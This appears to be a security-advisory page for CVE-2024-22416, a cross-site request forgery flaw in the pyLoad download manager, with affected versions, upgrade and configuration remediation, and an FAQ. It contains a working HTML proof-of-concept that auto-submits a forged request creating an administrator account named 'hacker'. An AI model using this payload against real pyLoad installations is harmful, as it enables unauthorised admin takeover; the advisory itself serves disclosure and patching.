CVE-2024-22416: Cross-Site Request Forgery on any API call in pyLoad may lead to admin privilege escalation

Published Jan 17, 2024
·
Updated

Summary The pyload API allows any API call to be made using GET requests. Since the session cookie is not set to SameSite: strict, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. This proof of concept shows how an unauthenticated user could trick the administrator's browser into creating a new admin user.

PoC We host the following HTML file on an attacker-controlled server. html <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://localhost:8000/api/adduser/%22hacker%22,%22hacker%22"> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>

If we now trick an administrator into visiting our malicious page at https://attacker.com/CSRF.html, we see that their browser will make a request to /api/adduser/%22hacker%22,%22hacker%22, adding a new administrator to the pyload application. !image

The attacker can now authenticate as this newly created administrator user with the username hacker and password hacker. !image

Impact Any API call can be made via a CSRF attack by an unauthenticated user.

Other sources

pyLoad is a free and open-source Download Manager written in pure Python. The pyload API allows any API call to be made using GET requests. Since the session cookie is not set to SameSite: strict, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release 0.5.0b3.dev78. All users are advised to upgrade.

— NVD

Affected Software

2 affected componentsFixes available
pip/pyload-ng<0.5.0b3.dev78
0.5.0b3.dev78
Pyload-ng Project Pyload-ng Python<0.5.0b3.dev78

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade pip/pyload-ng to a version that resolves this vulnerability.

    Fixed in 0.5.0b3.dev78
  2. Upgrade

    Upgrade pyLoad to a version that resolves this vulnerability.

    Fixed in 0.5.0b3.dev78
  3. Configuration

    The report states pyLoad allows any API call to be made using GET requests; change the API so state-changing actions cannot be executed via GET. (This mitigates the described CSRF-by-GET behavior.)

    pyLoad API HTTP method usage = Use non-GET (e.g., require POST) for API actions that change state
  4. Compensating control

    Ensure the session cookie for pyLoad is set to SameSite=Strict (the report states it is not set to `SameSite: strict`, enabling the CSRF scenario).

Event History

Jan 17, 2024
CVE Published
via MITRE·11:48 PM
Data Sourced
via MITRE·11:48 PM
DescriptionSeverityWeakness
Jan 18, 2024
Data Sourced
via NVD·12:15 AM
RemedyDescriptionSeverityWeaknessAffected Software
Jan 19, 2024
Advisory Published
via GitHub·03:27 PM

Frequently Asked Questions

1

What is the severity of CVE-2024-22416?

CVE-2024-22416 is considered a severe vulnerability due to its potential for Cross-Site Request Forgery (CSRF) attacks.

2

How do I fix CVE-2024-22416?

To mitigate CVE-2024-22416, upgrade to version 0.5.0b3.dev78 or later of the pyload-ng package.

3

Which versions of pyload-ng are affected by CVE-2024-22416?

CVE-2024-22416 affects all versions of pyload-ng prior to 0.5.0b3.dev78.

4

What type of attack does CVE-2024-22416 enable?

CVE-2024-22416 enables Cross-Site Request Forgery (CSRF) attacks due to improper session cookie settings.

5

Is there a proof of concept for CVE-2024-22416?

Yes, there is a proof of concept that demonstrates the exploitation of CVE-2024-22416 allowing unauthenticated API calls.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203